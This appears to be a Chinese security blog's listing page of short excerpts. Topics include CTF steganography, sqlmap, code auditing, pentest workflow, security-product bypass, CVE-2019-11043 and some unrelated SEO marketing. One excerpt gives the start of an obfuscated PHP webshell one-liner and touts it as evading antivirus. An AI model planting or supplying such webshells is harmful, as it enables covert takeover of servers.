-
-
stegsolve图片隐写查看器
今天做CTF隐写术的题偶然发现一隐写图片查看的神器------stegsolve,分享给大家 stegsolve下载地址:http://www.caesum.com/handbook/Stegsolve.jar stegsolve安装配置:配置好Java环境变量(就是需要安装Java,然后配环境变量,具体的配置过程上网一搜一堆,这里就不赘述) 配置好环境之后直接打开就可以使用 …- 0
- 0
- 1.7k
-
-
记一次从车库到核心网段的渗透之路
0x00 前言 前段时间做了个渗透测试的项目,其过程中与常规渗透测试略有不同。在这次渗透过程从外网WEB应用无任何进展后团队尝试了实地渗透的方式。最终从实地一点一点扩展到目标核心网络,过程中走了不少弯路,也有不少有趣的经历。因涉及相关部门敏感信息,这里只大致记录下过程,打重码,部分细节需自行脑补。 0x01 公共WiFi到内网 从决定实地渗透开始,从WiFi打入口点就是团队首要目标。经过一天的踩点…- 1
- 0
- 439
-
-
-
一次简单实战sqlmap注入
sqlmap注入工具----一次简单的注入(实战) 最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一…- 0
- 0
- 369
-
-
代码审计常用漏洞总结
1.1 审计方法总结 主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速 挖掘想要的漏洞。 以下是基于关…- 0
- 0
- 1k
-
2021kali网络安全web渗透测试课程视频教程
Kali是基于Debian的Linux发行版操作系统,一开始是由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,用来进行数字取证。 而且它拥有超过300个渗透测试工具,拥有开源Git树等,甚至还集成了600多种黑客工具,完全可以想象到它的强大性。此外大家还可以永久免费使用Kali操作系统!- 0
- 0
- 154
-
渗透测试各种扫描工具集合
集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举,数据库漏洞扫描,弱口令或信息泄漏扫描,端口扫描,指纹识别以及其他大型扫描器或模块化扫描器。项目地址:https://github.com/We5ter/Scanners-Box 子域名枚举扫描器或爆破工具 https://github.com/lijiejie/subDomainsBrute(lijiejie开发的一款使用…- 0
- 0
- 1.4k
-
白名单bulid执行绕过云锁安全狗套装360套装提权进服务器
0x00 前言 退出一线渗透测试也有2个多月了,感觉不搞技术的日子不太好过,心里空虚,烦恼,而又让人觉得无趣,借用兄弟们一句话说就是日了狗了,人一辈子最大的悲哀莫过于,中年失业,虽然我也不是失业,但是我这的尴尬比失业都尴尬、悲哀,所以,这些话谨献给那些奋斗在一线的,特别是乙方一线的渗透人员,希望你们要规划好自己的人生道路,以我为诫,到了中年犹如寒号鸟的哀鸣,又如野狼的嚎叫叫声,凄惨惨,悲戚戚,好不…- 0
- 0
- 961
-
一次完整的渗透测试流程
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个…- 0
- 0
- 1.3k
-
PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。 下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部分感谢团队小伙伴@Hcamael#知道创宇404实验室 漏洞复现 为了…- 0
- 0
- 1.2k
-
-
最新Webshell免杀PHP一句话变种
前言 最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。 class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VM…- 0
- 0
- 2.5k
-
啊d注入®啊,D注入工具怎么用啊?
注入工具只是一个检测注入漏洞的工具。如果网站没有这个漏洞,就无法注入!一般检测到的网站可以是扩展网站(其他扩展也可以,只要有SQL注入问题即可),至于老测试,还没检测到可用,因为现在很多网站都针对这个打了补丁脆弱,所以没有人是正常的。- 0
- 0
- 195
-
apk分析®如何分析反编译的apk源代码?
1、 apk分析:如何分析反编译的apk源代码? 这绝对是必须的。 安卓apk分析工具。 2、apk分析:app和apk是什么意思? App指的是手机- 0
- 0
- 66
-
-
品牌网站收录慢如何SEO优化?
“有事没事问度娘”,可见人们对百度的信任度是非常高的,因此不少企业现在对于品牌SEO优化非常重视。但是在日常的SEO优化过程中,企业知道高质量内容与优质链接,对于SEO排名,起着至关重要的作用,大量的话题都是围绕二者展开,但实际上有大量的基础性细节,同样值得关注,它往往是网站高速成长的基石。 如今,大多数的企业都在做SEO优化,那么如何保证自身的收录速度呢?网站收录速度可以直接反映出网站的质量及排…- 0
- 0
- 76
-
-
策划新品牌新企业快速通过网络营销引流
一家刚成立的新公司或是新企业,或者刚注册的新品牌,如何才能做好网络营销推广,从而提升知名度和口碑,这是每个新公司需要思考的问题。今天,就来为您介绍如何做好网络营销推广。其实非常简单,只需以下几步就可以搞定。 想要做好网络营销推广,无非就是要做到三点: 1、如何找到客户?(简而言之就是引流,做得更好可以让客户主动找到我们) 2、如何让客户相信我们?(这就是解决信任度问题,只要做到这点,引流不再是难题…- 0
- 0
- 34
-
¥优惠劵使用时效:无法使用使用时效:
之前
使用时效:永久有效优惠劵ID:×